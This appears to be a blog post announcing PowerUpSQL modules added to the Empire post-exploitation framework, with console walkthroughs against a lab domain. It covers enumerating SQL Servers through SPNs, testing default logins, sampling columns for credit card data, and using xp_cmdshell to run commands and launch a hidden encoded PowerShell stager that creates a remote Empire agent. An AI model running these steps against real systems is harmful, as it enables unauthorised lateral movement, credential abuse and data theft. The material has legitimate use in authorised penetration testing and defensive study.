The core of PowerUpSQL is now in Empire.

We have added the following modules to Empire:

  • Get-SQLInstanceDomain
    • powershell/situational_awareness/network/get_sql_instance_domain
  • Get-SQLServerInfo
    • powershell/situational_awareness/network/get_sql_server_info
  • Get-SQLServerDefaultLoginPW
    • powershell/recon/get_sql_server_login_default_pw
  • Get-SQLQuery
    • powershell/collection/get_sql_query
  • Get-SQLColumnSampleData
    • powershell/collection/get_sql_column_sample_data
  • Invoke-SQLOSCmd
    • powershell/lateral_movement/invoke_sqloscmd

Let’s quickly go over how these modules work in Empire as a few changes had to be made for it to be integrated.


The first module, Get-SQLInstanceDomain, is used for querying Active Directory for a list of SQL Servers by looking up their SPNs. In Empire, it is used in the following way:

(Empire: NCH9K51L) > usemodule situational_awareness/network/get_sql_instance_domain
(Empire: powershell/situational_awareness/network/get_sql_instance_domain) > options

 Name: Get-SQLInstanceDomain
            Module: powershell/situational_awareness/network/get_sql_instance_domain
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


 Returns a list of SQL Server instances discovered by
 querying a domain controller for systems with registered
 MSSQL service principal names. The function will default to
 the current user's domain and logon server, but an
 alternative domain controller can be provided. UDP scanning
 of management servers is optional.



 Name                 Required   Value                     Description
 ----                 --------   -------                   -----------
 UDPTimeOut           False 3                              Timeout in seconds for UDP scans of
                                                           management servers. Longer timeout =
                                                           more accurate.
 Username             False                                SQL Server or domain account to
                                                           authenticate with.
 ComputerName         False                                Computer name to filter for.
 DomainController     False                                Domain controller for Domain and Site
                                                           that you want to query against.
 DomainServiceAccount False                                Domain account to filter for.
 Password             False                                SQL Server or domain account password to
                                                           authenticate with.
 CheckMgmt            False      False                     Performs UDP scan of servers managing
                                                           SQL Server clusters.
 Agent                True       NCH9K51L                  Agent to run module on.

(Empire: powershell/situational_awareness/network/get_sql_instance_domain) > run
(Empire: powershell/situational_awareness/network/get_sql_instance_domain) >
Job started: 2T8P1H
Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
Parsing SQL Server instances from SPNs...
34 instances were found.
ComputerName     : sql-2012.test.local
Instance         : sql-2012.test.local,1433
DomainAccountSid : 15000005210002431346712921821222049996811922073100
DomainAccount    : SQL-2012$
DomainAccountCn  : SQL-2012
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql-2012.test.local:1433
LastLogon        : 2/22/2017 6:51 PM
Description      : VM with SQL Server 2012 installed

In some instances, UDP scanning servers with the MSServerClusterMgmtAPI SPN will yield additional result.

(Empire: powershell/situational_awareness/network/get_sql_instance_domain) > set CheckMgmt True
(Empire: powershell/situational_awareness/network/get_sql_instance_domain) > run
(Empire: powershell/situational_awareness/network/get_sql_instance_domain) >
Job started: CYS4KA

Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
Parsing SQL Server instances from SPNs...
Grabbing SPNs from the domain for Servers managing SQL Server clusters (MSServerClusterMgmtAPI)...
Performing a UDP scan of management servers to obtain managed SQL Server instances...
Parsing SQL Server instances from the UDP scan...
34 instances were found.
ComputerName     : sql-2012.test.local
Instance         : sql-2012.test.local

ComputerName     : sql-2012.test.local
Instance         : sql-2012.test.local,1433

ComputerName     : sql-2012.test.local
Instance         : sql-2012.test.local,50213


The next module, Get-SqlServerInfo, is used for gathering information about each SQL instance. This module, due to PowerShell variable limitations within Empire, can either be used against a single instance or against all instances in the Domain. To run it against a single instance, specify the instance using the Instance parameter.

(Empire: NCH9K51L) > usemodule situational_awareness/network/get_sql_server_info
(Empire: powershell/situational_awareness/network/get_sql_server_info) > options

              Name: Get-SQLServerInfo
            Module: powershell/situational_awareness/network/get_sql_server_info
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


 Returns basic server and user information from target SQL



 Name     Required    Value                     Description
 ----     --------    -------                   -----------
 Username False                                 SQL Server or domain account to
                                                authenticate with.
 Instance False                                 SQL Server instance to connection to.
 Password False                                 SQL Server or domain account password to
                                                authenticate with.
 Agent    True        NCH9K51L                  Agent to run module on.
 CheckAll False                                 Check all systems retrieved by Get-

(Empire: powershell/situational_awareness/network/get_sql_server_info) > set Instance sql-2012.test.local
(Empire: powershell/situational_awareness/network/get_sql_server_info) > run
(Empire: powershell/situational_awareness/network/get_sql_server_info) >
Job started: MY3AH7

ComputerName           : sql-2012.test.local
Instance               : sql-2012
DomainName             : test
ServiceName            : MSSQLSERVER
ServiceAccount         : NT Service\MSSQLSERVER
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 11.0.6248.0
SQLServerMajorVersion  : 2012
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP3
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 10 Pro
OsVersionNumber        : 6.3
Currentlogin           : test\user
IsSysadmin             : Yes
ActiveSessions         : 0

To query all instances of SQL servers in the Domain, set the CheckAll flag to true. This will run Get-SqlInstanceDomain and pipe the results into Get-SqlServerInfo.

(Empire: powershell/situational_awareness/network/get_sql_server_info) > set CheckAll True
(Empire: powershell/situational_awareness/network/get_sql_server_info) > run
(Empire: powershell/situational_awareness/network/get_sql_server_info) >
Job started: 7KDR1S

ComputerName           : sql-2012.test.local
Instance               : sql-2012
DomainName             : test
ServiceName            : MSSQLSERVER
ServiceAccount         : NT Service\MSSQLSERVER
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 11.0.6248.0
SQLServerMajorVersion  : 2012
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP3
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 10 Pro
OsVersionNumber        : 6.3
Currentlogin           : test\user
IsSysadmin             : Yes
ActiveSessions         : 0

ComputerName           : sqlexpress.test.local
Instance               : sqlexpress\SQLEXPRESS
DomainName             : test
ServiceName            : MSSQL$SQLEXPRESS
ServiceAccount         : NT Service\MSSQL$SQLEXPRESS
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.5540.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Express Edition (64-bit)
SQLServerServicePack   : SP2
OSArchitecture         : X64
OsMachineType          :
OSVersionName          :
OsVersionNumber        : 6.3
Currentlogin           : test\user
IsSysadmin             : No
ActiveSessions         : 0


The module Get-SqlServerDefaultLoginPW will scan the Domain for default SQL server logins. As with the other modules, this one also supports the CheckAll flag to run across the Domain.

(Empire: powershell/recon/get_sql_server_login_default_pw) > usemodule powershell/recon/get_sql_server_login_default_pw
(Empire: powershell/recon/get_sql_server_login_default_pw) > options

              Name: Get-SQLServerLoginDefaultPw
            Module: powershell/recon/get_sql_server_login_default_pw
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


  Based on the instance name, test if SQL Server is configured
  with default passwords.



  Name     Required    Value                     Description
  ----     --------    -------                   -----------
  Username False                                 SQL Server or domain account to
                                                 authenticate with. Only used for
  Instance False                                 SQL Server instance to connection to.
  Password False                                 SQL Server or domain account password to
                                                 authenticate with. Only used for
  Agent    True        NCH9K51L                  Agent to run module on.
  CheckAll False                                 Check all systems retrieved by Get-

(Empire: powershell/recon/get_sql_server_login_default_pw) > set Instance sqlexpress.test.local\SQLEXPRESS
(Empire: powershell/recon/get_sql_server_login_default_pw) > run
(Empire: powershell/recon/get_sql_server_login_default_pw) >
Job started: RMNTG5

sql-2012.test.local\sqlexpress : Confirmed instance match.
sql-2012.test.local\sqlexpress : Confirmed default credentials - admin/ca_admin
Computer   : sqlexpress.test.local
Instance   : sqlexpress.test.local\SQLEXPRESS
Username   : admin
Password   : ca_admin
IsSysAdmin : No


The next module, Get-SqlQuery, will preform a generic SQL query on the specified instance. It is used in the following way:

(Empire: NCH9K51L) > usemodule collection/get_sql_query
(Empire: powershell/collection/get_sql_query) > options

              Name: Get-SQLQuery
            Module: powershell/collection/get_sql_query
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


  Executes a query on target SQL servers.



  Name     Required    Value                     Description
  ----     --------    -------                   -----------
  Username False                                 SQL Server or domain account to
                                                 authenticate with.
  Instance False                                 SQL Server instance to connection to.
  Password False                                 SQL Server or domain account password to
                                                 authenticate with.
  Agent    True        NCH9K51L                  Agent to run module on.
  Query    True                                  Query to be executed on the SQL Server.

(Empire: powershell/collection/get_sql_query) > set Instance sql-2012.test.local
(Empire: powershell/collection/get_sql_query) > set Query SELECT @@VERSION
(Empire: powershell/collection/get_sql_query) > run
(Empire: powershell/collection/get_sql_query) >
Job started: PDAHEY

sql-2012.test.local : Connection Success.
Microsoft SQL Server 2012 (SP3-GDR) (KB3194721) - 11.0.6248.0 (X64)
        Sep 23 2016 15:49:43
        Copyright (c) Microsoft Corporation
        Developer Edition (64-bit) on Windows NT 6.3  (Build 14393: )


The next module is one of the most powerful modules within PowerUpSQL. Get-SqlColumnSampleData queries databases for columns and then based upon keywords, pulls down column data for analysis. This module has been particularly useful on PCI engagements to search for plain text credit card info. It is generally recommended to just run this module against all instances.

(Empire: NCH9K51L) > usemodule powershell/collection/get_sql_column_sample_data
(Empire: powershell/collection/get_sql_column_sample_data) > options

              Name: Get-SQLColumnSampleData
            Module: powershell/collection/get_sql_column_sample_data
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


  Returns column information from target SQL Servers. Supports
  search by keywords, sampling data, and validating credit
  card numbers.



  Name       Required    Value                     Description
  ----       --------    -------                   -----------
  Username   False                                 SQL Server or domain account to
                                                   authenticate with.
  CheckAll   False                                 Check all systems retrieved by Get-
  NoDefaults False                                 Don't select tables from default
  Agent      True        NCH9K51L                  Agent to run module on.
  Instance   False                                 SQL Server instance to connection to.
  Password   False                                 SQL Server or domain account password to
                                                   authenticate with.

(Empire: powershell/collection/get_sql_column_sample_data) > set Instance sql-2012.test.local
(Empire: powershell/collection/get_sql_column_sample_data) > set NoDefaults True
(Empire: powershell/collection/get_sql_column_sample_data) > run
(Empire: powershell/collection/get_sql_column_sample_data) >
Job started: PR61EX

sql-2012.test.local : START SEARCH DATA BY COLUMN
sql-2012.test.local : - Connection Success.
sql-2012.test.local : - Searching for column names that match criteria...
sql-2012.test.local : - No columns were found that matched the search.
sql-2012.test.local : END SEARCH DATA BY COLUMN

Hopefully your results are better.


Now for the party favorite, Invoke-SqlOsCmd. This leverages xp_cmdshell to run commands on the remote system in the context of the SQL Server user.

(Empire: NCH9K51L) > usemodule powershell/lateral_movement/invoke_sqloscmd
(Empire: powershell/lateral_movement/invoke_sqloscmd) > options

              Name: Invoke-SQLOSCMD
            Module: powershell/lateral_movement/invoke_sqloscmd
        NeedsAdmin: False
         OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
   OutputExtension: None


  Executes a command or stager on remote hosts using


  Name       Required    Value                     Description
  ----       --------    -------                   -----------
  Listener   False                                 Listener to use.
  CredID     False                                 CredID from the store to use.
  Command    False                                 Custom command to execute on remote
  Proxy      False       default                   Proxy to use for request (default, none,
                                                   or other).
  UserName   False                                 [domain\]username to use to execute
  Instance   True                                  Host[s] to execute the stager on, comma
  UserAgent  False       default                   User-agent string to use for the staging
                                                   request (default, none, or other).
  ProxyCreds False       default                   Proxy credentials
                                                   ([domain\]username:password) to use for
                                                   request (default, none, or other).
  Password   False                                 Password to use to execute command.
  Agent      True        NCH9K51L                  Agent to run module on.

This module has two methods for running. The first is to simply run a user specified command on the remote system.

(Empire: powershell/lateral_movement/invoke_sqloscmd) > set Instance sql-2012.test.local
(Empire: powershell/lateral_movement/invoke_sqloscmd) > set Command whoami
(Empire: powershell/lateral_movement/invoke_sqloscmd) > run
(Empire: powershell/lateral_movement/invoke_sqloscmd) >
Job started: 6KVEUC

sql-2012.test.local : Connection Success.
sql-2012.test.local : You are a sysadmin.
sql-2012.test.local : Show Advanced Options is disabled.
sql-2012.test.local : Enabled Show Advanced Options.
sql-2012.test.local : xp_cmdshell is disabled.
sql-2012.test.local : Enabled xp_cmdshell.
sql-2012.test.local : Running command: whoami

nt service\mssqlserver

sql-2012.test.local : Disabling xp_cmdshell
sql-2012.test.local : Disabling Show Advanced Options
However, this is the Empire, why not just place an agent on the remote system? Well we can natively do that as well.

(Empire: powershell/lateral_movement/invoke_sqloscmd) > unset Command
(Empire: powershell/lateral_movement/invoke_sqloscmd) > set Listener http
(Empire: powershell/lateral_movement/invoke_sqloscmd) > run
(Empire: powershell/lateral_movement/invoke_sqloscmd) >
Job started: X3U26K
[+] Initial agent 59BNMXTA from now active

sql-2012.test.local : Connection Success.
sql-2012.test.local : You are a sysadmin.
sql-2012.test.local : Show Advanced Options is disabled.
sql-2012.test.local : Enabled Show Advanced Options.
sql-2012.test.local : xp_cmdshell is disabled.
sql-2012.test.local : Enabled xp_cmdshell.
sql-2012.test.local : Running command: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -Enc [TRUNCATED]

sql-2012.test.local : Disabling xp_cmdshell
sql-2012.test.local : Disabling Show Advanced Options

(Empire: powershell/lateral_movement/invoke_sqloscmd) >

SELECT * FROM PowerUpSQL WHERE dark_side > light_side;

In the future, as we add modules to PowerUpSQL, we expect to continue to add them to Empire as well.